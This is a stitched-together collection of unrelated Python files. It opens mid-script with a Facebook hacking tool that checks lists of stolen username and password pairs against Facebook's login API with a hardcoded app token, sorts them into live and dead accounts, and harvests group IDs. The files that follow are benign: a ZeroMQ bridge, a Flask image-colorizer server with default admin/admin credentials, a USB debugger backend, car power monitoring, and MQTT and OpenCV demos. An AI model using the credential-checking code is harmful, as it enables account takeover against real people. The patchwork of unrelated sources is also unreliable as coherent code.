file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
remote_Server.py
|
#
# Created on Sat Oct 09 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
import os, sys
import threading
import numpy as np
import time
import zmq
import json
pwd = os.path.abspath(__file__)
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
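# A small ZeroMQ PUB/SUB bridge: the server publishes to subscribers on port
# 8008 under the "Server Sends" topic and listens for client messages on port
# 8080 under the "Client Sends" topic.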
class SERVER(object):
def __init__(self):
super(SERVER, self).__init__()
context = zmq.Context()
self.send_port = 8008
self.send_topic = "Server Sends"
self.send_socket = context.socket(zmq.PUB)
self.send_socket.bind("tcp://*:%d" % self.send_port)
self.recv_port = 8080
self.recv_topic = "Client Sends"
self.recv_socket = context.socket(zmq.SUB)
self.recv_socket.bind("tcp://*:%d" % self.recv_port)
self.recv_socket.setsockopt_string(zmq.SUBSCRIBE, self.recv_topic)
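    # Messages are framed as "<topic><json payload>"; receive() strips the
    # topic prefix and recv_forever() parses the remaining JSON payload.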
def send(self, message):
message = json.dumps(message)
msg = "%s%s" % (self.send_topic, message)
self.send_socket.send_string(msg)
print("Sending data:", message)
def send_forever(self, message=''):
i = 0
while True:
self.send(message + str(i))
i += 1
i %= 100000
time.sleep(1)
def receive(self):
message = self.recv_socket.recv_string()
return message[len(self.recv_topic):]
def recv_forever(self):
while True:
message = self.receive()
control = json.loads(message)
print("Received request:", control)
if __name__ == "__main__":
msg = 'server to client'
server = SERVER()
p1 = threading.Thread(target=server.send_forever, args=((msg,)))
p2 = threading.Thread(target=server.recv_forever, args=())
p1.start()
p2.start()
print('Prepared to send data')
print('Prepared to receive data')
p1.join()
p2.join()
|
app.py
|
# serve.py
from flask import Flask, request, render_template, send_from_directory, Blueprint, jsonify, Response
from werkzeug.utils import secure_filename
from werkzeug.datastructures import CombinedMultiDict
from werkzeug.exceptions import BadRequest
from pathlib import Path
import logging, os, subprocess, sys
from script import ClouderizerEval
from functools import wraps
import json
import threading
# creates a Flask application, named app
app = Flask(__name__)
cldz_eval = ClouderizerEval(app)
PROJECT_HOME = os.path.dirname(os.path.realpath(__file__))
UPLOAD_FOLDER = '{}/uploads/'.format(PROJECT_HOME)
OUTPUT_FOLDER = '{}/output/'.format(PROJECT_HOME)
app.config.from_json('config.json')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['OUTPUT_FOLDER'] = OUTPUT_FOLDER
#app.config['COMMAND'] = "python ../code/fast_neural_style/neural_style/neural_style.py eval --content-image $IMG1$ --model ../code/fast_neural_style/saved_models/rain_princess.pth --output-image $OIMG1$ --cuda 0"
#app.config['COMMAND'] = ""
sys.path.append(os.path.abspath("../code/"))
from fastai.torch_imports import *
from fastai.core import *
from fasterai.filters import Colorizer34
from fasterai.visualize import ModelImageVisualizer
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
return username == app.config['UNAME'] and password == app.config['PASSWORD']
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required. Default credentials admin/admin"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
def updateConfig(key, value):
jsonFile = open("config.json", "r") # Open the JSON file for reading
data = json.load(jsonFile) # Read the JSON into the buffer
jsonFile.close() # Close the JSON file
## Working with buffered content
data[key] = value
## Save our changes to JSON file
jsonFile = open("config.json", "w+")
jsonFile.write(json.dumps(data))
jsonFile.close()
def create_new_folder(local_dir):
newpath = local_dir
if not os.path.exists(newpath):
os.makedirs(newpath)
return newpath
# Quick fix for 504 Gateway error due to model initialization
colorizer_path = '../code/colorize_gen_192.h5'
render_factor = 42
ALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])
cldz_serve_outputdir = "./output"
filters=None
vis=None
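# The colorizer model is loaded on a background thread at startup so the web
# server can begin serving requests immediately; /api/eval reports
# "Model initialising" until `vis` has been populated.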
def run_job():
global filters, vis
print('Loading models')
    filters = [Colorizer34(gpu=0, weights_path=colorizer_path, nf_factor=2, map_to_orig=True)]
    vis = ModelImageVisualizer(filters, render_factor=render_factor, results_dir=cldz_serve_outputdir)
print('model loading is done')
modelThread = threading.Thread(target=run_job)
modelThread.start()
def model_inference(requestparams):
    if 'image' not in requestparams:
        raise BadRequest("File not present in request")
    file = requestparams['image']
    if file.filename == '':
        raise BadRequest("File name is not present in request")
    if not allowed_file(file.filename):
        raise BadRequest("Invalid file type")
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
input_filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
output_filepath = Path(os.path.join(app.config['OUTPUT_FOLDER'], filename))
file.save(input_filepath)
# modelThread.join()
print(vis)
if vis is not None:
try:
result = vis.get_transformed_image_ndarray(input_filepath)
vis.save_result_image(output_filepath, result)
except AttributeError:
pass
else:
return jsonify("Model initialising"), "object"
output = {}
output["directory"]=app.config['OUTPUT_FOLDER']
output["filename"]=filename
# app.logger.info(requestparams)
return output, "imagepath"
# a route where we will display a welcome message via an HTML template
@app.route("/", defaults={'path': ''})
@app.route("/<path:path>")
def home(path):
dir = os.path.join(os.curdir, 'static')
bp = Blueprint('cast', __name__, static_folder=dir, static_url_path='')
if(path == ''):
return bp.send_static_file('index.html')
else:
return bp.send_static_file(path)
@app.route("/api/eval", methods = ['POST'])
def eval():
output, outputtype = model_inference(CombinedMultiDict((request.files, request.form)))
if outputtype == 'imagepath':
return send_from_directory(directory=output['directory'],filename=output['filename'], as_attachment=True)
elif outputtype == 'object':
return output
else:
return "Some error occured"
@app.route("/api/script", methods = ['GET'])
@requires_auth
def getEvalCode():
with open("script.py", "r") as f:
content = f.read()
return jsonify(
text=content
)
@app.route("/api/script", methods = ['POST'])
@requires_auth
def updateEvalCode():
script = request.form['script']
with open("script.py", "w") as f:
f.write(script)
return jsonify(
success=True
)
@app.route("/api/command", methods = ['GET'])
@requires_auth
def getCommand():
return jsonify(
text=app.config['COMMAND']
)
@app.route("/api/command", methods = ['POST'])
@requires_auth
def updateCommand():
command = request.form['command']
app.config['COMMAND'] = command
updateConfig('COMMAND', command)
return jsonify(
success=True
)
@app.route("/api/projname", methods = ['GET'])
def getProjName():
return jsonify(
projectname=app.config['PROJECTNAME']
)
@app.route("/api/credentials", methods = ['POST'])
@requires_auth
def updateCredentials():
uname = request.form['uname']
password = request.form['password']
app.config['UNAME'] = uname
app.config['PASSWORD'] = password
updateConfig('UNAME', uname)
updateConfig('PASSWORD', password)
return Response(
'Credentials updated. Login again.', 401)
@app.route("/api/logout", methods = ['GET'])
@requires_auth
def logout():
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401)
# run the application
if __name__ == "__main__":
app.run(debug=True)
|
pyusb_backend.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from interface import Interface
import logging, os, threading
from ..dap_access_api import DAPAccessIntf
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
logging.error("PyUSB is required on a Linux Machine")
isAvailable = False
else:
isAvailable = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
isAvailable = isAvailable
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get hid interface
interface = None
interface_number = None
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number is None or interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
self.serial_number)
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & 0x80:
ep_in = endpoint
else:
ep_out = endpoint
# If there is no EP for OUT then we can use CTRL EP.
# The IN EP is required
if not ep_in:
raise DAPAccessIntf.DeviceError("Unable to open device -"
" no endpoints")
# Detach kernel driver
kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
dev.detach_kernel_driver(interface_number)
kernel_driver_was_attached = True
except NotImplementedError as e:
            # Some implementations don't have kernel attach/detach
logging.debug('Exception detaching kernel driver: %s' %
str(e))
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError:
raise DAPAccessIntf.DeviceError("Unable to open device")
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
self.kernel_driver_was_attached = kernel_driver_was_attached
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
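    # rx_task blocks on read_sem, so an IN transfer is only issued after write()
    # releases the semaphore; this keeps reads paired one-to-one with requests.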
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def getAllConnectedInterface():
"""
returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = 64
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
pass
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def setPacketCount(self, count):
# No interface level restrictions on count
self.packet_count = count
def getSerialNumber(self):
return self.serial_number
def close(self):
"""
close the interface
"""
assert self.closed is False
logging.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
logging.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class FindDap(object):
"""CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""Return True if this is a DAP device, False otherwise"""
try:
device_string = dev.product
except ValueError:
# Permission denied error gets reported as ValueError (langid)
return False
except usb.core.USBError as error:
logging.warning("Exception getting product string: %s", error)
return False
except IndexError as error:
logging.warning("Internal pyusb error: %s", error)
return False
if device_string is None:
return False
if device_string.find("CMSIS-DAP") < 0:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
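# Usage sketch, assuming at least one CMSIS-DAP probe is plugged in: list the
# boards found by the interface above. Only getAllConnectedInterface() and
# getSerialNumber(), both defined in this module, are used; nothing runs on import.
def list_connected_daps():
    for board in PyUSB.getAllConnectedInterface():
        print("%s %s (serial: %s)" % (board.vendor_name,
                                      board.product_name,
                                      board.getSerialNumber()))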
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 12.4 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 7*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
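# Worked example for CAR_VOLTAGE_LOW_PASS_K above, a sketch assuming the
# pandaState update period is dt = 0.5 s (2 Hz). With tau = 5 s,
# K = (dt/tau) / (dt/tau + 1) = 0.1 / 1.1, about 0.0909, i.e. the 0.091 used above.
def _lpf_gain_example(dt=0.5, tau=5.0):
    k = (dt / tau) / (dt / tau + 1)
    # Simulate a voltage step from 12 V to 13 V; after 20 samples (10 s, about 2*tau)
    # the filtered value has covered roughly 85% of the step.
    filtered_mV = 12e3
    for _ in range(20):
        filtered_mV = (13e3 * k) + (filtered_mV * (1 - k))
    return k, filtered_mV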
|
VideoGuardar.py
|
import threading
import cv2
def getFrame():
global frame
while True:
frame = video_capture.read()[1]
def face_analyse():
while True:
pass
        # do some of the operations you want
def realtime():
while True:
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
video_capture.release()
cv2.destroyAllWindows()
break
if __name__ == "__main__":
video_capture = cv2.VideoCapture(0)
frame = video_capture.read()[1]
    cv2.imwrite("imagen2.jpg", frame)
    gfthread = threading.Thread(target=getFrame, args=())
    gfthread.daemon = True
    gfthread.start()
    rtthread = threading.Thread(target=realtime, args=())
    rtthread.daemon = True
    rtthread.start()
    fathread = threading.Thread(target=face_analyse, args=())
    fathread.daemon = True
    fathread.start()
    while True:  # keep the main thread alive; the worker threads are daemons and exit with it
        pass
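# Hedged alternative sketch (never called above): hand the grabber thread a lock
# and a small state dict so readers never observe a half-updated frame. The names
# grab_frames / state are illustrative, not part of the original script.
def grab_frames(capture, lock, state):
    # state is expected to look like {"frame": None}
    while True:
        ok, new_frame = capture.read()
        if not ok:
            break
        with lock:
            state["frame"] = new_frame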
pass
|
send data to simulated feed with paho-mqtt publish.py
|
# Import standard python modules
import threading
import time
import os
import sys
# Import paho MQTT client.
import paho.mqtt.client as mqtt
# Define callback functions which will be called when certain events happen.
def on_connect(client, userdata, flags, rc):
    # Connected function will be called when the client connects.
    print("Connected with result code: " + str(rc))
    client.connectedFlag = True
def on_disconnect(client, userdata, rc):
    # Disconnected function will be called when the client disconnects.
    print("Disconnected!")
    os._exit(1)
# Define Functions for Threading
def send_message(client):
while True:
if(client.messageSend is not None):
client.publish("area9876/tanque0/capacidad", client.messageSend)
time.sleep(10)
if __name__ == "__main__":
if(len(sys.argv)!=2):
sys.stderr.write('Usage: "{0}" $hostAddress\n'.format(sys.argv[0]))
os._exit(1)
# Setup MQTT Client Instance
client = mqtt.Client()
# Setup Callbacks
client.on_connect = on_connect
client.on_disconnect=on_disconnect
# Setup Control Vars
client.connectedFlag=False
client.messageSend="0"
# Connect to the Broker server.
print("Conectando al broker")
client.connect(host=sys.argv[1], port=1883, keepalive=60)
client.loop_start()
while not client.connectedFlag:
print("Esperando conexión")
time.sleep(1)
# Setup Threading, to publish message every 10 seconds
hilo0=threading.Thread(target=send_message, args=(client,))
hilo0.start()
# Mod publish value
while client.messageSend!="x": # char 'x' to exit
        client.messageSend = input("Enter a new value for the tank\n")
client.loop_stop()
client.disconnect()
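# Hedged companion sketch (not invoked above): a minimal subscriber for the same
# feed, using only standard paho-mqtt calls (Client, subscribe, loop_forever).
def run_subscriber(host):
    def on_message(client, userdata, msg):
        print(msg.topic + ": " + msg.payload.decode())
    sub = mqtt.Client()
    sub.on_message = on_message
    sub.connect(host=host, port=1883, keepalive=60)
    sub.subscribe("area9876/tanque0/capacidad")
    sub.loop_forever()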
|
client.py
|
import json
import logging
import socket
import threading
